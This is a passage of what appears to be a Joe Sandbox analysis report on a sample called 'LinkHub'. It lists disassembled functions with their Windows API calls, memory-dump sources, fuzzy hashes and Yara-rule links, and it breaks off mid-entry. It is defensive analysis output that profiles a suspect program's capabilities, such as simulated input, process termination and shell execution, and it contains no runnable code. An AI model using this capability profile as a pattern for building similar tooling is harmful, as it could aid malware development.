                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                        • String ID:
                                                                                        • API String ID: 2387181109-0
                                                                                        • Opcode ID: 1defcb21c0be5a4f7c327158997a9e9bf1c92a7f95a58e5d0f5c383a78028842
                                                                                        • Instruction ID: ff12cdf763ad074450c7912f4193ec16356cd6fd9ebf4cc7207128f918b902e0
                                                                                        • Opcode Fuzzy Hash: 1defcb21c0be5a4f7c327158997a9e9bf1c92a7f95a58e5d0f5c383a78028842
                                                                                        • Instruction Fuzzy Hash: 18310276516316ABD720EF14E849F9BBBA9FF84314F00091AF889971C1DB30E918CBD2
                                                                                        Function 002655E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 002655F9
                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00265616
                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0026564E
                                                                                        • _wcslen.LIBCMT ref: 0026566C
                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00265674
                                                                                        • _wcsstr.LIBVCRUNTIME ref: 0026567E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                        • String ID:
                                                                                        • API String ID: 72514467-0
                                                                                        • Opcode ID: 7d498d121ec7f394c9893df412c5ea5a711305e34ef27c3cbd9600032b888271
                                                                                        • Instruction ID: 27458f56a0f179505257e6e3c89a760c28996466a56d48c74dec97420b36770f
                                                                                        • Opcode Fuzzy Hash: 7d498d121ec7f394c9893df412c5ea5a711305e34ef27c3cbd9600032b888271
                                                                                        • Instruction Fuzzy Hash: 4F212632224621BBEB155F68EC49E7B7BACDF45750F14402AF809CA091EBA1DCA1DA60
                                                                                        Function 00276263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00205851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002055D1,?,?,00244B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00205871
                                                                                        • _wcslen.LIBCMT ref: 002762C0
                                                                                        • CoInitialize.OLE32(00000000), ref: 002763DA
                                                                                        • CoCreateInstance.OLE32(002A0CC4,00000000,00000001,002A0B34,?), ref: 002763F3
                                                                                        • CoUninitialize.OLE32 ref: 00276411
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 3172280962-24824748
                                                                                        • Opcode ID: 2b2e133ca70c6041725280ed804727db374711e74e22626b00b02e5c1c517d18
                                                                                        • Instruction ID: e35e0d8987b20d3f89a24e88a8403495d0c01e61a3aa332eb9e47e674996546d
                                                                                        • Opcode Fuzzy Hash: 2b2e133ca70c6041725280ed804727db374711e74e22626b00b02e5c1c517d18
                                                                                        • Instruction Fuzzy Hash: 10D13471A147019FC714DF24C488A2ABBE5EF89714F14899DF8899B3A2CB31EC55CF92
                                                                                        Function 002236F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,002236E9,00223355), ref: 00223700
                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0022370E
                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00223727
                                                                                        • SetLastError.KERNEL32(00000000,?,002236E9,00223355), ref: 00223779
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                        • String ID:
                                                                                        • API String ID: 3852720340-0
                                                                                        • Opcode ID: 6f33dbe1abedf45192a11fe10caba1dab32ec8940e5bdb48a56215b555193418
                                                                                        • Instruction ID: 1f58d74b25631e48fd0af83f55584503918220aac06ae94d68e85cc967a46573
                                                                                        • Opcode Fuzzy Hash: 6f33dbe1abedf45192a11fe10caba1dab32ec8940e5bdb48a56215b555193418
                                                                                        • Instruction Fuzzy Hash: 4A01D8B26793327EAA24ABF8BCCAA766694EB15771730023AF110450F1EF554D225944
                                                                                        Function 002330E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,00232908,002C9B48,0000000C,00223268,00000001,?,?), ref: 002330EB
                                                                                        • _free.LIBCMT ref: 0023311E
                                                                                        • _free.LIBCMT ref: 00233146
                                                                                        • SetLastError.KERNEL32(00000000), ref: 00233153
                                                                                        • SetLastError.KERNEL32(00000000), ref: 0023315F
                                                                                        • _abort.LIBCMT ref: 00233165
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                        • String ID:
                                                                                        • API String ID: 3160817290-0
                                                                                        • Opcode ID: 07669c2c379d911f57a7fa3614ba0bf694a395b2623cb5794f5e408e04d656ad
                                                                                        • Instruction ID: 0ea756a0c97d540be8aab1944b3daeb53890ad8a8afe4f3742e2deef8ed5ca7b
                                                                                        • Opcode Fuzzy Hash: 07669c2c379d911f57a7fa3614ba0bf694a395b2623cb5794f5e408e04d656ad
                                                                                        • Instruction Fuzzy Hash: 68F028F693060167C222BB34BC0AE5E126A9FC1771F250425FA2CD22E1EF60CF365961
                                                                                        Function 00299480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00201F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00201F87
                                                                                          • Part of subcall function 00201F2D: SelectObject.GDI32(?,00000000), ref: 00201F96
                                                                                          • Part of subcall function 00201F2D: BeginPath.GDI32(?), ref: 00201FAD
                                                                                          • Part of subcall function 00201F2D: SelectObject.GDI32(?,00000000), ref: 00201FD6
                                                                                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 002994AA
                                                                                        • LineTo.GDI32(?,00000003,00000000), ref: 002994BE
                                                                                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 002994CC
                                                                                        • LineTo.GDI32(?,00000000,00000003), ref: 002994DC
                                                                                        • EndPath.GDI32(?), ref: 002994EC
                                                                                        • StrokePath.GDI32(?), ref: 002994FC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                        • String ID:
                                                                                        • API String ID: 43455801-0
                                                                                        • Opcode ID: 64497b6c8957587028dc4fc59d2e823adc57f077e002fdb9259460958b3cc2c7
                                                                                        • Instruction ID: c244561749794c057513a4ef7834a809faeaae3622e569cb4f6a0622b5347aaa
                                                                                        • Opcode Fuzzy Hash: 64497b6c8957587028dc4fc59d2e823adc57f077e002fdb9259460958b3cc2c7
                                                                                        • Instruction Fuzzy Hash: 9E11DE7601010DBFDF129F94EC89FDA7F6DEB08364F048016FA1956161C7719D55DBA0
                                                                                        Function 00265B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00265B7C
                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00265B8D
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00265B94
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00265B9C
                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00265BB3
                                                                                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00265BC5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$Release
                                                                                        • String ID:
                                                                                        • API String ID: 1035833867-0
                                                                                        • Opcode ID: 5fed8a48c704373f3a9d3bbc5db42795caee6a8c2b6b6578d7a2edfc0ab0ef33
                                                                                        • Instruction ID: ef0736a1eb20400b593a53b6ba5f73ecedef10db75d67681d5870b8c098b6e6e
                                                                                        • Opcode Fuzzy Hash: 5fed8a48c704373f3a9d3bbc5db42795caee6a8c2b6b6578d7a2edfc0ab0ef33
                                                                                        • Instruction Fuzzy Hash: BA016275E00719BBEB109FA5AC49F4EBFB8EF48751F004066FA09A7280D6709C11DFA0
                                                                                        Function 0020327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 002032AF
                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 002032B7
                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002032C2
                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 002032CD
                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 002032D5
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 002032DD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual
                                                                                        • String ID:
                                                                                        • API String ID: 4278518827-0
                                                                                        • Opcode ID: 154e2fcbec0be03bc17372de84af7a153971b7fe9f9534be08aafcdc4b06b986
                                                                                        • Instruction ID: 1f9fbb186c41a1f0cac3808ae7632a1b86db409d3e6ea27dd1d8702b0eaab6ad
                                                                                        • Opcode Fuzzy Hash: 154e2fcbec0be03bc17372de84af7a153971b7fe9f9534be08aafcdc4b06b986
                                                                                        • Instruction Fuzzy Hash: 140167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                        Function 0026F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0026F447
                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0026F45D
                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0026F46C
                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0026F47B
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0026F485
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0026F48C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 839392675-0
                                                                                        • Opcode ID: 703026a6ec4793a05c4a85df3c149d030d8451e7de0f80d4ae0e3dd82b23d0c6
                                                                                        • Instruction ID: d737abcdcf5293b324c783e04816ba3b51f3b1981b28239556d15b0352d1c08d
                                                                                        • Opcode Fuzzy Hash: 703026a6ec4793a05c4a85df3c149d030d8451e7de0f80d4ae0e3dd82b23d0c6
                                                                                        • Instruction Fuzzy Hash: A1F03036241158BBE7215B62BC0EEEF7B7CEFC6B11F00005AF60592090DBA05A41E6B5
                                                                                        Function 002434D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?), ref: 002434EF
                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00243506
                                                                                        • GetWindowDC.USER32(?), ref: 00243512
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00243521
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00243533
                                                                                        • GetSysColor.USER32(00000005), ref: 0024354D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                        • String ID:
                                                                                        • API String ID: 272304278-0
                                                                                        • Opcode ID: 95e4d6c45cd121aa5a7f691bd07f28268dfc0040a7e45fddf50327b31063001c
                                                                                        • Instruction ID: f246484ba505f9dd917344cfa99c8e506ea19db04416915fa6f8b0872743de4d
                                                                                        • Opcode Fuzzy Hash: 95e4d6c45cd121aa5a7f691bd07f28268dfc0040a7e45fddf50327b31063001c
                                                                                        • Instruction Fuzzy Hash: 7B016D32510205EFDB509FA4EC0CFE9BBB5FF18321F910162F91AA21A1CB311E51AF10
                                                                                        Function 002621C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002621CC
                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 002621D8
                                                                                        • CloseHandle.KERNEL32(?), ref: 002621E1
                                                                                        • CloseHandle.KERNEL32(?), ref: 002621E9
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 002621F2
                                                                                        • HeapFree.KERNEL32(00000000), ref: 002621F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                        • String ID:
                                                                                        • API String ID: 146765662-0
                                                                                        • Opcode ID: 4ce03c6299d6c0f232212dada5037ec76067e177ddb80d65cb2874803dcc0e93
                                                                                        • Instruction ID: 1afdedfde62f0b434feea4901b020b418f79b7d688bae88f4a10aee3eadab7ab
                                                                                        • Opcode Fuzzy Hash: 4ce03c6299d6c0f232212dada5037ec76067e177ddb80d65cb2874803dcc0e93
                                                                                        • Instruction Fuzzy Hash: FCE0E57B004105BBDB011FA1FD0D94ABF39FF49322B904222F22982074CB329420EF55
                                                                                        Function 0028B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 0028B903
                                                                                          • Part of subcall function 002041EA: _wcslen.LIBCMT ref: 002041EF
                                                                                        • GetProcessId.KERNEL32(00000000), ref: 0028B998
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0028B9C7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                        • String ID: <$@
                                                                                        • API String ID: 146682121-1426351568
                                                                                        • Opcode ID: ec0b7c55d2be385eb95c4a94b09cdb0d64137bcd3f35753db4560c32421b6026
                                                                                        • Instruction ID: 30c3d6fc713a519246c60d48bd97b160a2b86d1b17d3b0f611ce1ea0b0bf95fc
                                                                                        • Opcode Fuzzy Hash: ec0b7c55d2be385eb95c4a94b09cdb0d64137bcd3f35753db4560c32421b6026
                                                                                        • Instruction Fuzzy Hash: 59717778A20615DFCB11EF94C494A9EBBF4BF08300F048499E856AB392CB70ED65CF90
                                                                                        Function 00267B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00267B6D
                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00267BA3
                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00267BB4
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00267C36
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                        • String ID: DllGetClassObject
                                                                                        • API String ID: 753597075-1075368562
                                                                                        • Opcode ID: 462c562bed6b599fbf0d387d1af183a6a365a7045a84a2a1a098b4613433e31c
                                                                                        • Instruction ID: 2e5096c021badae1c0b8e2e0a8f57052684e99aa8a81d9d44f03cac008642721
                                                                                        • Opcode Fuzzy Hash: 462c562bed6b599fbf0d387d1af183a6a365a7045a84a2a1a098b4613433e31c
                                                                                        • Instruction Fuzzy Hash: 7641D471614205EFDB15CF24E884A9A7BB9EF44318F1080AEEC0ADF209D7B1DD94CBA0
                                                                                        Function 00294818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002948D1
                                                                                        • IsMenu.USER32(?), ref: 002948E6
                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0029492E
                                                                                        • DrawMenuBar.USER32 ref: 00294941
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$DrawInfoInsert
                                                                                        • String ID: 0
                                                                                        • API String ID: 3076010158-4108050209
                                                                                        • Opcode ID: f0f6a8ba022351872069c63a16b3c8829c7127cd5697c204e90617e7fe246aaa
                                                                                        • Instruction ID: ddd83404082b4ae3d354d834828c4be492a862cb8ca3eb9592096bbc6e5a4630
                                                                                        • Opcode Fuzzy Hash: f0f6a8ba022351872069c63a16b3c8829c7127cd5697c204e90617e7fe246aaa
                                                                                        • Instruction Fuzzy Hash: B5414A75A1120AEFEF10DF51E884EAABBB9FF06324F444129E94697250C730AD66CF60
                                                                                        Function 0026272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                          • Part of subcall function 002645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00264620
                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002627B3
                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002627C6
                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 002627F6
                                                                                          • Part of subcall function 00208577: _wcslen.LIBCMT ref: 0020858A
                                                                                        Strings
                                                                                        Memory Dump Source
